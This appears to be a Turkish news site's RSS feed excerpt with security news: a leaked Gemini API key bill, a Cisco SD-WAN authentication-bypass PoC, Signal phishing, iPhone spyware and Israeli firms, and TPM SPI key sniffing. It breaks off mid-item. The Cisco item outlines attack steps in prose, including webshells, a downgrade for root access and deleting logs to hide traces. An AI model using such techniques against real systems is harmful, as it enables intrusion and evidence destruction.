<description><![CDATA[ Bir geliştiricinin Google Cloud projesine bağlı Gemini API anahtarının ele geçirilmesi sonrası saldırganların yoğun yapay zekâ istekleri oluşturduğu ve 48 saat içinde 82 bin doları aşan fatura oluştuğu bildirildi. Güvenlik araştırmaları ise kamuya açık sitelerde binlerce Google API anahtarının hâlâ erişilebilir durumda olduğunu ortaya koydu. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd98135f36.webp" length="64892" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:44:00 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>google cloud api anahtarı sızıntısı nedir, gemini api key güvenliği nasıl sağlanır, google api key sızıntısı nasıl tespit edilir, bulut api anahtarları nasıl korunur</media:keywords>
<content:encoded><![CDATA[<p><br data-start="480" data-end="483">Google Cloud altyapısına bağlı Gemini API anahtarının ele geçirilmesi, kısa sürede yüksek maliyetli bir siber güvenlik olayına dönüştü. Bir yazılım geliştiricinin aylık ortalama <strong data-start="661" data-end="674">180 dolar</strong> olan bulut kullanım maliyetinin, anahtarın kötüye kullanılması sonrası <strong data-start="746" data-end="782">48 saat içinde 82 bin 314 dolara</strong> yükseldiği bildirildi.</p>
<p></p>
<p data-start="807" data-end="1016">Geliştirici, API anahtarının nasıl sızdırıldığını henüz kesin olarak tespit edemediğini belirtirken saldırganların ele geçirilen anahtarı kullanarak büyük ölçekli yapay zekâ istekleri oluşturduğu ifade edildi.</p>
<p data-start="1018" data-end="1062"><strong data-start="1018" data-end="1062">Binlerce Açık API Anahtarı Tespit Edildi</strong></p>
<p data-start="1064" data-end="1379">Siber güvenlik firması Truffle Security tarafından yapılan araştırmada, kamuya açık internet sitelerinde <strong data-start="1169" data-end="1210">2 bin 863 adet Google API anahtarının</strong> erişilebilir durumda olduğu tespit edildi. Araştırmacılar, ilgili projelerde Gemini API etkinleştirildiğinde bu anahtarların doğrulama için kullanılabildiğini açıkladı.</p>
<p data-start="1381" data-end="1628">Araştırma raporunda Google’ın söz konusu durumu başlangıçta <strong data-start="1441" data-end="1484">“beklenen davranış” (intended behavior)</strong> olarak değerlendirdiği ifade edildi. Ancak uzmanlar, kamuya açık API anahtarlarının ciddi güvenlik ve maliyet riskleri oluşturduğunu vurguladı.</p>
<p data-start="1630" data-end="1682"><strong data-start="1630" data-end="1682">Tek Bir Anahtar Büyük Maliyetlere Yol Açabiliyor</strong></p>
<p data-start="1684" data-end="2043">Siber güvenlik uzmanları, saldırganların çoğu zaman doğrudan sunuculara saldırmak yerine sızdırılmış API anahtarlarını hedef aldığını belirtti. Bu anahtarlar ele geçirildiğinde saldırganların yüksek hacimli yapay zekâ işlemleri çalıştırabildiği, bulut servislerini kötüye kullanabildiği ve kısa sürede yüksek maliyetli işlem yükleri oluşturabildiği aktarıldı.</p>
<p data-start="2045" data-end="2246">Uzmanlar, “Sızdırılmış bir API anahtarı saldırganlara kontrolsüz erişim sağlayabilir ve bu durum binlerce dolarlık işlem maliyetinin kullanıcıya yansımasına neden olabilir.” değerlendirmesinde bulundu.</p>
<p data-start="2248" data-end="2294"><strong data-start="2248" data-end="2294">Güvenlik Uzmanlarından Temel Önlem Uyarısı</strong></p>
<p data-start="2296" data-end="2666">Uzmanlar, bu tür olayların önlenmesi için API anahtarlarının <strong data-start="2357" data-end="2431">ön uç (frontend) kodlarında veya herkese açık depolarda paylaşılmaması</strong> gerektiğini belirtti. Ayrıca doğrudan API erişimi yerine sunucu taraflı proxy kullanılması, anahtarların IP veya alan adı kısıtlamalarıyla sınırlandırılması ve kullanım kotaları ile faturalandırma uyarılarının aktif edilmesi önerildi.</p>
<p data-start="2668" data-end="2822">Güvenlik ekipleri ayrıca API anahtarlarının düzenli olarak yenilenmesi ve API kullanımında olağan dışı artışların sürekli izlenmesi gerektiğini vurguladı.</p>
<p data-start="2824" data-end="3006"><strong data-start="2824" data-end="2836"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>CISCO CATALYST SD&#45;WAN SİSTEMLERİNDEKİ KRİTİK GÜVENLİK AÇIĞI İÇİN PoC YAYIMLANDI</title>
<link>https://www.ajansexpres.com.tr/cisco-catalyst-sd-wan-sistemlerindeki-kritik-guvenlik-acigi-icin-poc-yayimlandi</link>
<guid>https://www.ajansexpres.com.tr/cisco-catalyst-sd-wan-sistemlerindeki-kritik-guvenlik-acigi-icin-poc-yayimlandi</guid>
<description><![CDATA[ Cisco Catalyst SD-WAN ürünlerini etkileyen ve CVSS 10.0 kritik seviyesinde değerlendirilen CVE-2026-20127 güvenlik açığı için Proof-of-Concept (PoC) exploit yayımlandı. Açığın kimlik doğrulama mekanizmasındaki bir hatadan kaynaklandığı ve saldırganların oturum açmadan yetkili erişim elde edebildiği belirtildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd98779267.webp" length="60808" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:43:55 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>cisco sd-wan güvenlik açığı nedir, cve-2026-20127 nasıl çalışıyor, cisco sd-wan authentication bypass saldırısı, cisco sd-wan güvenlik güncellemesi nasıl yapılır</media:keywords>
<content:encoded><![CDATA[<p><br data-start="443" data-end="446">Cisco Catalyst SD-WAN ürünlerini etkileyen kritik bir güvenlik açığı için Proof-of-Concept (PoC) exploit yayımlandı. CVE-2026-20127 olarak tanımlanan ve CVSS 10.0 puanına sahip olan açık, SD-WAN Controller (eski adıyla vSmart) ile SD-WAN Manager (eski adıyla vManage) sistemlerinde yer alan eşleşme (peering) kimlik doğrulama mekanizmasındaki bir zafiyetten kaynaklanıyor.</p>
<p></p>
<p data-start="820" data-end="1074">Siber güvenlik araştırmacıları tarafından paylaşılan bilgilere göre saldırganlar, özel olarak hazırlanmış istekler göndererek kimlik doğrulama sürecini tamamen atlayabiliyor. Bu sayede sisteme giriş yapmadan yetkili erişim elde edilebildiği ifade edildi.</p>
<p data-start="1076" data-end="1127"><strong data-start="1076" data-end="1127">PoC Kodları Uzaktan Kod Çalıştırmayı Hedefliyor</strong></p>
<p data-start="1129" data-end="1374">Yayımlanan PoC paketinin Python betikleri ve JSP tabanlı webshell dosyaları içerdiği bildirildi. Bu araçların kimlik doğrulama öncesi uzaktan kod çalıştırma (pre-authentication remote code execution) saldırıları için kullanılabileceği aktarıldı.</p>
<p data-start="1376" data-end="1700">Siber güvenlik analizlerinde, saldırının başarılı olması durumunda saldırganların NETCONF protokolü üzerinden 830 numaralı port aracılığıyla SD-WAN altyapı yapılandırmalarını okuyabildiği ve değiştirebildiği belirtildi. Ayrıca saldırganların kontrol veya yönetim düzlemine sahte eşler (rogue peers) ekleyebildiği kaydedildi.</p>
<p data-start="1702" data-end="1736"><strong data-start="1702" data-end="1736">Birden Fazla Sürüm Etkileniyor</strong></p>
<p data-start="1738" data-end="1939">Açığın 20.6 ile 20.18.x arasındaki birçok SD-WAN sürümünü etkilediği bildirildi. Güvenlik güncellemesi yayımlanan sürümler arasında 20.9.8.2 ve 20.18.2.1 gibi yamalı versiyonların yer aldığı açıklandı.</p>
<p data-start="1941" data-end="2233">Araştırmacılar ayrıca saldırganların sistemi daha eski bir sürüme düşürerek CVE-2022-20775 güvenlik açığını kullanabildiğini belirtti. Bu yöntemle kök (root) seviyesinde yetki yükseltmesi sağlanabildiği, ardından sistemin tekrar güncel sürüme döndürülerek izlerin gizlenebildiği ifade edildi.</p>
<p data-start="2235" data-end="2268"><strong data-start="2235" data-end="2268">Ağ İçinde Yatay Hareket Riski</strong></p>
<p data-start="2270" data-end="2616">Uzmanlar, sistem kontrolünün ele geçirilmesi durumunda saldırganların sisteme SSH anahtarları ekleyebileceğini, meşru kullanıcıları taklit edebileceğini ve günlük kayıtlarını silebileceğini bildirdi. Özellikle <strong data-start="2480" data-end="2556">/var/log dizinindeki logların silinmesi ve komut geçmişinin temizlenmesi</strong> gibi iz gizleme yöntemlerinin kullanılabileceği vurgulandı.</p>
<p data-start="2618" data-end="2746">Saldırganların NETCONF veya SSH üzerinden ağ içinde yatay hareket ederek farklı sistemlere erişim sağlayabileceği de kaydedildi.</p>
<p data-start="2748" data-end="2792"><strong data-start="2748" data-end="2792">Cisco’dan Güncelleme ve Güvenlik Uyarısı</strong></p>
<p data-start="2794" data-end="3127">Cisco tarafından yayımlanan güvenlik duyurusunda sistem yöneticilerine etkilenen sürümlerin acilen güncellenmesi çağrısı yapıldı. Ayrıca kullanılmayan peering bağlantılarının devre dışı bırakılması ve şüpheli kullanıcı hesapları, boş log kayıtları veya sürüm düşürme izleri gibi göstergelerin yakından izlenmesi gerektiği belirtildi.</p>
<p data-start="3129" data-end="3307"><strong data-start="3129" data-end="3141"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>SIGNAL KULLANICILARINI HEDEF ALAN KİMLİK AVI SALDIRILARINA KARŞI UYARI YAPTI</title>
<link>https://www.ajansexpres.com.tr/signal-kullanicilarini-hedef-alan-kimlik-avi-saldirilarina-karsi-uyari-yapti</link>
<guid>https://www.ajansexpres.com.tr/signal-kullanicilarini-hedef-alan-kimlik-avi-saldirilarina-karsi-uyari-yapti</guid>
<description><![CDATA[ Mesajlaşma uygulaması Signal, kullanıcıları hedef alan yeni bir kimlik avı kampanyasına karşı güvenlik uyarısı yayımladı. Saldırganların “Signal Support Bot” gibi sahte hesaplar üzerinden kullanıcıları kandırarak SMS doğrulama kodlarını ele geçirmeye çalıştığı belirtilirken, şirket kullanıcıların doğrulama kodlarını kimseyle paylaşmaması gerektiğini vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69afd98eb9697.webp" length="55346" type="image/jpeg"/>
<pubDate>Tue, 10 Mar 2026 11:43:50 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>signal phishing saldırısı nedir, signal doğrulama kodu dolandırıcılığı nasıl yapılır, signal support bot sahte mesajları nasıl anlaşılır, signal hesap güvenliği nasıl korunur</media:keywords>
<content:encoded><![CDATA[<p><br data-start="491" data-end="494">Signal, son dönemde kullanıcıları hedef alan yeni bir kimlik avı (phishing) kampanyasına ilişkin güvenlik uyarısı yayımladı. Şirket, sosyal mühendislik yöntemleri kullanılan saldırılarda kötü niyetli kişilerin kendilerini “Signal Support Bot” gibi güvenilir görünen hesaplar olarak tanıttığını açıkladı.</p>
<p></p>
<p data-start="799" data-end="1079">Signal tarafından paylaşılan güvenlik bilgilendirmesinde, saldırganların kullanıcılara “cihazınızda şüpheli etkinlik tespit edildi” şeklinde mesajlar gönderdiği belirtildi. Mesajlarda hesap güvenliğini sağlama bahanesiyle SMS doğrulama kodunun paylaşılmasının istendiği aktarıldı.</p>
<p data-start="1081" data-end="1367">Şirket, bu kodun paylaşılması durumunda saldırganların kullanıcının Signal hesabını ele geçirebileceğine dikkat çekti. Signal tarafından yapılan bilgilendirmede, “Doğrulama kodunun üçüncü kişilerle paylaşılması, hesabın kontrolünün kaybedilmesine yol açabilir.” ifadelerine yer verildi.</p>
<p data-start="1369" data-end="1412"><strong data-start="1369" data-end="1412">Sosyal Mühendislik Yöntemi Kullanılıyor</strong></p>
<p data-start="1414" data-end="1735">Signal güvenlik rehberinde, saldırıların teknik bir açık yerine kullanıcıların güvenini hedef alan sosyal mühendislik yöntemleriyle gerçekleştirildiği vurgulandı. Sahte destek hesaplarının genellikle hızlı hareket edilmesi gerektiğini belirten mesajlar göndererek kullanıcıları baskı altına almaya çalıştığı ifade edildi.</p>
<p data-start="1737" data-end="1973">Şirket, kullanıcıların özellikle doğrulanmamış hesaplardan gelen mesajlara karşı dikkatli olması gerektiğini belirtti. Açıklamada, “Signal hiçbir zaman kullanıcılardan doğrulama kodu veya giriş bilgilerini talep etmez.” uyarısı yapıldı.</p>
<p data-start="1975" data-end="2013"><strong data-start="1975" data-end="2013">Kullanıcılara Güvenlik Tavsiyeleri</strong></p>
<p data-start="2015" data-end="2307">Signal, olası hesap ele geçirme girişimlerine karşı bazı temel güvenlik önlemlerini de paylaştı. Buna göre kullanıcıların SMS doğrulama kodlarını hiçbir kişi veya bot ile paylaşmaması, şüpheli bağlantılara tıklamaması ve güvenilir olmayan mesajlara karşı dikkatli olması gerektiği belirtildi.</p>
<p data-start="2309" data-end="2421">Şirket, güvenlik farkındalığının artırılmasının bu tür saldırıların önlenmesinde kritik rol oynadığını kaydetti.</p>
<p data-start="2423" data-end="2614"><strong data-start="2423" data-end="2435"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>İsrail ve iPhone’ların Hacklenmesi Tartışması: Güvenlik, İstihbarat ve Teknoloji Ekosistemi</title>
<link>https://www.ajansexpres.com.tr/israil-ve-iphonelarin-hacklenmesi-tartismasi-guvenlik-istihbarat-ve-teknoloji-ekosistemi</link>
<guid>https://www.ajansexpres.com.tr/israil-ve-iphonelarin-hacklenmesi-tartismasi-guvenlik-istihbarat-ve-teknoloji-ekosistemi</guid>
<description><![CDATA[ CNN Türk muhabirinin İsrail’de gözaltına alınması ve telefonunun izinsiz incelenmesi, gazetecilerin dijital güvenliği konusunu tekrar gündeme taşıdı. Benzer olaylar geçmişte Amerika Birleşik Devletleri’nde de yaşandı. Apple, İsrail’de Ar-Ge merkezleri ve startup satın alımlarıyla (PrimeSense, Anobit, LinX Imaging, RealFace) teknoloji ekosistemine entegre oldu. Bu şirketler genellikle kamera, yüz tanıma ve donanım optimizasyonları üzerine çalışıyor. Öte yandan İsrail merkezli NSO Group ve Candiru gibi firmalar, “zero-click” saldırılarla hedefli cihazlara erişim sağlayabiliyor. Bu durum, savaş ve istihbarat bağlamında telefonların potansiyel olarak istihbarat toplamak için kullanılabileceğini gösteriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69a7ef006466e.webp" length="101102" type="image/jpeg"/>
<pubDate>Wed, 04 Mar 2026 11:37:48 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>iPhone hack, Emrah Çakmak, İsrail gözaltı, Pegasus spyware, NSO Group, Apple güvenlik, siber güvenlik, zero-click saldırı, hedefli istihbarat, İsrailli siber güvenlik şirketleri, Apple Ar-Ge İsrail, CyberArk, Wiz, dijital gözetim, gazeteci güvenliği, siber tehditler, mobil cihaz güvenliği, İsrail teknoloji, siber istihbarat araçları, Apple startup satın almaları</media:keywords>
<content:encoded><![CDATA[<h1 data-start="162" data-end="255">İsrail ve iPhone’ların Hacklenmesi Tartışması: Güvenlik, İstihbarat ve Teknoloji Ekosistemi</h1>
<h2 data-start="257" data-end="298">Gazeteciler ve Dijital Güvenlik</h2>
<p data-start="300" data-end="702">İsrail’de gözaltına alınan Türk gazeteci <strong data-start="341" data-end="357">Emrah Çakmak</strong>, iPhone telefonunun şifresini paylaşmamasına rağmen cihazın açıldığını açıkladı. Bu olay, gazetecilerin dijital güvenliğinin ne kadar hassas bir konu olduğunu bir kez daha gösterdi. Söz konusu durum, yalnızca bireysel bir ihlal değil; devletlerin dijital cihazlara erişim kapasitesi ve sınırları hakkında daha geniş bir tartışmayı da tetikledi.</p>
<p data-start="704" data-end="988">Benzer şekilde geçmişte <span class="whitespace-normal">Amerika Birleşik Devletleri</span>'nde bazı basın mensuplarının telefonlarının hedefli siber saldırılarla ele geçirildiği ortaya çıkmıştır. Bu tür olaylar, gazetecilerin ve aktivistlerin gelişmiş gözetim teknolojilerinin hedefi olabileceğini göstermektedir.</p>
<h2 data-start="995" data-end="1035">Apple Ekosistemi ve İsrail Bağlantısı</h2>
<p data-start="1037" data-end="1414"><span class="whitespace-normal">Apple</span>, yalnızca ABD merkezli bir şirket değildir; dünya genelinde önemli Ar-Ge merkezlerine sahiptir. İsrail’de özellikle Tel Aviv ve Hayfa gibi şehirlerde Apple mühendislik ve güvenlik araştırma merkezleri bulunmaktadır. Bu merkezler, işlemci tasarımı, güvenlik mimarileri ve donanım optimizasyonu gibi kritik alanlarda faaliyet göstermektedir.</p>
<p data-start="1416" data-end="1671">Apple’ın İsrail’de yüzlerce mühendisi ve Ar-Ge personeli istihdam ettiği bilinmektedir. Özellikle güvenlik ve biyometrik sistemler üzerinde çalışan bu ekipler, iPhone ve diğer Apple cihazlarının donanım ve yazılım güvenliğini geliştirmede kilit rol oynar.</p>
<h2 data-start="1678" data-end="1723">Apple’ın Satın Aldığı İsrailli Startup’lar</h2>
<p data-start="1725" data-end="1785">Apple, İsrail merkezli birçok startup’ı bünyesine katmıştır:</p>
<ul data-start="1787" data-end="2186">
<li data-start="1787" data-end="1887">
<p data-start="1789" data-end="1887"><strong data-start="1789" data-end="1830"><span class="whitespace-normal">PrimeSense</span></strong> – 3D sensör teknolojileri, Face ID altyapısının temeli</p>
</li>
<li data-start="1888" data-end="1993">
<p data-start="1890" data-end="1993"><strong data-start="1890" data-end="1931"><span class="whitespace-normal">Anobit</span></strong> – Flash depolama çözümleri, iPhone veri saklama performansı</p>
</li>
<li data-start="1994" data-end="2094">
<p data-start="1996" data-end="2094"><strong data-start="1996" data-end="2037"><span class="whitespace-normal">LinX Imaging</span></strong> – Çok lensli kamera sistemleri, iPhone kamera gelişimi</p>
</li>
<li data-start="2095" data-end="2186">
<p data-start="2097" data-end="2186"><strong data-start="2097" data-end="2138"><span class="whitespace-normal">RealFace</span></strong> – Yüz tanıma teknolojileri, biyometrik güvenlik</p>
</li>
</ul>
<p data-start="2188" data-end="2295">Bu startup’lar, doğrudan hackleme için değil, cihaz performansı ve kullanıcı deneyimi odaklı çalışmaktadır.</p>
<h2 data-start="2302" data-end="2358">İsrailli Siber Güvenlik Firmaları ve Küresel Etkileri</h2>
<p data-start="2360" data-end="2537">İsrail, dünya çapında önde gelen bir siber güvenlik ekosistemine sahiptir. Birçok büyük teknoloji şirketi, İsrail merkezli firmaları veya Ar-Ge merkezlerini bünyesine katmıştır:</p>
<h3 data-start="2539" data-end="2574">Örnek Alımları ve Bağlantıları:</h3>
<ul data-start="2576" data-end="2906">
<li data-start="2576" data-end="2607">
<p data-start="2578" data-end="2607"><strong data-start="2578" data-end="2599">Alphabet (Google)</strong> – Wiz</p>
</li>
<li data-start="2608" data-end="2681">
<p data-start="2610" data-end="2681"><strong data-start="2610" data-end="2632">Palo Alto Networks</strong> – CyberArk, Talon Cyber Security, Dig Security</p>
</li>
<li data-start="2682" data-end="2706">
<p data-start="2684" data-end="2706"><strong data-start="2684" data-end="2695">Zscaler</strong> – Avalor</p>
</li>
<li data-start="2707" data-end="2734">
<p data-start="2709" data-end="2734"><strong data-start="2709" data-end="2722">Microsoft</strong> – Adallom</p>
</li>
<li data-start="2735" data-end="2757">
<p data-start="2737" data-end="2757"><strong data-start="2737" data-end="2746">Armis</strong> – Otorio</p>
</li>
<li data-start="2758" data-end="2789">
<p data-start="2760" data-end="2789"><strong data-start="2760" data-end="2772">Bitsight</strong> – Cybersixgill</p>
</li>
<li data-start="2790" data-end="2826">
<p data-start="2792" data-end="2826"><strong data-start="2792" data-end="2809">Cato Networks</strong> – Aim Security</p>
</li>
<li data-start="2827" data-end="2885">
<p data-start="2829" data-end="2885"><strong data-start="2829" data-end="2847">Continental AG</strong> – Argus Cyber Security (PlaxidityX)</p>
</li>
<li data-start="2886" data-end="2906">
<p data-start="2888" data-end="2906"><strong data-start="2888" data-end="2896">Okta</strong> – Axiom</p>
</li>
</ul>
<h3 data-start="2908" data-end="2961">Diğer İsrailli Şirketler ve Araştırma Merkezleri:</h3>
<ul data-start="2963" data-end="3400">
<li data-start="2963" data-end="3400">
<p data-start="2965" data-end="3400">1Touch.io, AccSenSe, ACID Technologies, Actifile, CyberDB, L7 Defense, Deep Instinct, Certora, Beyond, Skybox Security, Valid Network, CrowdStrike, Coro, Silverfort, BioCatch, Riskified, Torq Built In, Claroty, CyberX Labs, Perception Point, Xinnor, Storm, Cyber DriveWare, Upstream-Security, Cyabra, Babacode, Dome9 Security, CYREBRO (platform), Cyber 72, Citadel Cyber Security, HUB Security, CyberSafe, Javelin Networks, NSO Group</p>
</li>
</ul>
<h3 data-start="3402" data-end="3455">İsrailli Siber Güvenlik Şirketleri (Genel Liste):</h3>
<p data-start="3457" data-end="3814">CyberArk, Wiz, Hudson Rock, Sasa Software, Perimeter 81, odix, C2A Security, Check Point Software Technologies, Cato Networks, Radware, Qualysec, Orca Security, Aqua, Transmit, Forter, Pentera, CyCognito, Hunters, torq, CYE, Cyera, BigID, Deep Instinct, Island, Axonius, Wing Security, Noma Security, Token Security, Gomboc, Descope, Astrix Security, Reco</p>
<p data-start="3816" data-end="3980">Bu firmalar, hem ticari hem de devlet destekli siber güvenlik çözümleri geliştirmekte; özellikle <strong data-start="3913" data-end="3927">zero-click</strong> ve hedefli saldırı araçları ile gündeme gelmektedir.</p>
<h2 data-start="3987" data-end="4044">İsrailli Mühendislerin ve Eski Askerlerin Küresel Rolü</h2>
<p data-start="4046" data-end="4240">İsrail vatandaşları, özellikle askeri geçmişe sahip (Unit 8200, IDF Siber Savunma Müdürlüğü) kişiler, dünya çapındaki büyük teknoloji ve siber güvenlik firmalarında önemli roller üstlenmektedir:</p>
<ul data-start="4242" data-end="4581">
<li data-start="4242" data-end="4346">
<p data-start="4244" data-end="4346">Microsoft, Palo Alto Networks, VMware: 1.400+ eski IDF mensubu, güvenlik ve mühendislik pozisyonları</p>
</li>
<li data-start="4347" data-end="4452">
<p data-start="4349" data-end="4452">Meta (Facebook): Yüzlerce eski IDF subayı ve istihbarat mensubu, AI politika ve güvenlik pozisyonları</p>
</li>
<li data-start="4453" data-end="4581">
<p data-start="4455" data-end="4581">Google, Microsoft: Eski istihbaratçılar üst düzey pozisyonlarda politika, güvenlik ve altyapı stratejilerini şekillendiriyor</p>
</li>
</ul>
<p data-start="4583" data-end="4679">Bu durum, İsrail’in siber yeteneklerinin küresel teknoloji ekosistemine entegrasyonunu gösterir.</p>
<h2 data-start="4686" data-end="4734">Zero-Click Saldırılar ve Güvenlik Perspektifi</h2>
<p data-start="4736" data-end="4884">“Zero-click” saldırılar, hedef cihazın kullanıcının herhangi bir eylemine gerek kalmadan ele geçirilmesini sağlayan gelişmiş yöntemlerdir. Örnekler:</p>
<ul data-start="4886" data-end="4974">
<li data-start="4886" data-end="4913">
<p data-start="4888" data-end="4913"><strong data-start="4888" data-end="4911">NSO Group – Pegasus</strong></p>
</li>
<li data-start="4914" data-end="4929">
<p data-start="4916" data-end="4929"><strong data-start="4916" data-end="4927">Candiru</strong></p>
</li>
<li data-start="4930" data-end="4974">
<p data-start="4932" data-end="4974">Diğer gelişmiş siber istihbarat araçları</p>
</li>
</ul>
<p data-start="4976" data-end="5135">Bu araçlar, yüksek maliyetli ve devlet destekli operasyonlar için tasarlanmıştır. Sıradan kullanıcıların kitlesel şekilde risk altında olması oldukça düşüktür.</p>
<h2 data-start="5142" data-end="5179">Teknoloji, Güvenlik ve Algı</h2>
<ul data-start="5181" data-end="5541">
<li data-start="5181" data-end="5288">
<p data-start="5183" data-end="5288">iPhone’lar güçlü güvenlik sistemlerine sahiptir, ancak hedefli operasyonlarda zafiyetler kullanılabilir</p>
</li>
<li data-start="5289" data-end="5366">
<p data-start="5291" data-end="5366">İsrail, hem teknoloji hem de siber güvenlik alanında global bir merkezdir</p>
</li>
<li data-start="5367" data-end="5445">
<p data-start="5369" data-end="5445">Devlet destekli firmalar, istihbarat ve gözetim teknolojilerini geliştirir</p>
</li>
<li data-start="5446" data-end="5541">
<p data-start="5448" data-end="5541">Eski asker ve istihbaratçılar, küresel teknoloji şirketlerinde kritik roller üstlenmektedir</p>
</li>
</ul>
<p data-start="5543" data-end="5685">Dolayısıyla, mesele cihazların tek başına kırılabilirliği değil; <strong data-start="5608" data-end="5684">küresel teknoloji, siber güvenlik ve istihbarat dengelerinin kesişimidir</strong>.</p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Moxa UC&#45;1222A TPM 2.0 Cihazında LUKS Şifre Anahtarları SPI Üzerinden Düz Metin Olarak Sızdırıldı</title>
<link>https://www.ajansexpres.com.tr/moxa-uc-1222a-tpm-20-cihazinda-luks-sifre-anahtarlari-spi-uzerinden-duz-metin-olarak-sizdirildi</link>
<guid>https://www.ajansexpres.com.tr/moxa-uc-1222a-tpm-20-cihazinda-luks-sifre-anahtarlari-spi-uzerinden-duz-metin-olarak-sizdirildi</guid>
<description><![CDATA[ Araştırmacılar, Moxa UC-1222A Secure Edition cihazının önyükleme sırasında TPM2_NV_Read komutu aracılığıyla LUKS disk şifre anahtarlarını SPI arayüzü üzerinden düz metin olarak ilettiğini ortaya koydu. Fiziksel erişime sahip bir saldırganın, SPI hattını pasif olarak izleyerek anahtarı ele geçirebileceği tespit edildi. Moxa, sorunu kabul ederek CVE-2026-0714 olarak kayıt altına aldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202603/image_870x580_69a49336335db.webp" length="70288" type="image/jpeg"/>
<pubDate>Sun, 01 Mar 2026 22:28:17 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Moxa UC-1222A TPM güvenlik açığı nedir, TPM2_NV_Read nasıl çalışır, SPI bus sniffing saldırısı nasıl gerçekleştirilir, LUKS anahtarları nasıl korunabilir</media:keywords>
<content:encoded><![CDATA[<p><strong data-start="541" data-end="566">Araştırma ve Bulgular</strong><br data-start="566" data-end="569">Per Idenfeldt Okuyama ve Sam Eizad tarafından yürütülen güvenlik çalışmasında, ARM tabanlı Moxa UC-1222A Secure Edition endüstriyel bilgisayarının TPM 2.0 çipi ile korunan LUKS disk anahtarlarının önyükleme sırasında SPI arayüzü üzerinden düz metin olarak iletildiği tespit edildi. Araştırmacılar, TPM tarafından yetkilendirme politikasının doğru şekilde uygulandığını, ancak anahtar materyalinin şifrelenmeden SoC ile TPM arasında iletildiğini belirtti.</p>
<p data-start="1027" data-end="1380"><strong data-start="1027" data-end="1048">TPM ve SPI Yapısı</strong><br data-start="1048" data-end="1051">Cihazda kullanılan Infineon SLB9670 TPM 2.0, cihaz şifreleme anahtarlarını NV (Non-Volatile) alanında saklıyor. Önyükleme sırasında SoC, TPM2_NV_Read komutu ile NV indeksinden anahtarı talep ediyor. Yanıt, SPI hattı üzerinden okunabilir şekilde iletiliyor ve fiziksel erişime sahip bir saldırgan tarafından ele geçirilebiliyor.</p>
<p data-start="1382" data-end="1783"><strong data-start="1382" data-end="1412">Donanım ve Yazılım Analizi</strong><br data-start="1412" data-end="1415">Çalışmada, Logic 8 Saleae 8 kanallı mantık analizörü kullanılarak SPI hattı pasif olarak izlendi. Firmware içinde tespit edilen generate-keys betiği, tpm2_nvread komutunu çalıştırarak LUKS anahtarını NV indeksinden çekiyor. Analiz sırasında alınan MISO/MOSI verileri işlenerek anahtar binary olarak çıkarıldı ve doğruluğu eMMC chipinden yapılan testlerle doğrulandı.</p>
<p data-start="1785" data-end="2308"><strong data-start="1785" data-end="1822">Tespit Edilen Riskler ve Önlemler</strong><br data-start="1822" data-end="1825">Fiziksel erişimi olan bir saldırgan, TPM 2.0 çip ile SoC arasındaki SPI hattını izleyerek disk şifre anahtarını ele geçirebilir. Trusted Computing Group (TCG) tarafından önerilen mitigasyonlar arasında, komut ve yanıt parametrelerinin şifrelenmesi için yetkilendirme oturumları (bound/salted sessions) kullanılması yer alıyor. Salted session kullanımı, kullanıcı girişi olmadan da parametre güvenliği sağlarken, bound session yalnızca yüksek entropili authValue ile koruma sunuyor.</p>
<p data-start="2310" data-end="2662"><strong data-start="2310" data-end="2331">Sonuç ve Öneriler</strong><br data-start="2331" data-end="2334">Araştırma, TPM tabanlı korumanın yalnızca masaüstü veya dizüstü bilgisayarlara özgü olmadığını, gömülü ve endüstriyel cihazlarda da TPM bus sniffing riskinin bulunduğunu ortaya koyuyor. Moxa, güvenlik açığını CVE-2026-0714 olarak kaydetti ve kullanıcıların TPM bus korumasını sağlamak için TCG kılavuzlarına uyması öneriliyor.</p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Grandstream GXP1600 IP Telefonlarında Kritik Güvenlik Açığı İş Görüşmelerini Tehlikeye Sokuyor</title>
<link>https://www.ajansexpres.com.tr/grandstream-gxp1600-ip-telefonlarinda-kritik-guvenlik-acigi-is-goerusmelerini-tehlikeye-sokuyor</link>
<guid>https://www.ajansexpres.com.tr/grandstream-gxp1600-ip-telefonlarinda-kritik-guvenlik-acigi-is-goerusmelerini-tehlikeye-sokuyor</guid>
<description><![CDATA[ Grandstream GXP1600 IP telefonlarında CVE-2026-2329 kodlu kritik bir güvenlik açığı tespit edildi. Yetkisiz kişiler, cihazları uzaktan ele geçirerek iş çağrılarını dinleyebilir ve SIP ayarlarını değiştirebilir. Güncelleme sürümü 1.0.7.81 kullanıcılar için yayımlandı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202602/image_870x580_699b3cdac1e6e.webp" length="51346" type="image/jpeg"/>
<pubDate>Sun, 22 Feb 2026 20:29:12 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>Grandstream GXP1600 açığı nasıl çalışıyor, SIP kimlik bilgileri nasıl çalınıyor, iş görüşmeleri nasıl risk altında, güvenlik güncellemesi nasıl uygulanır</media:keywords>
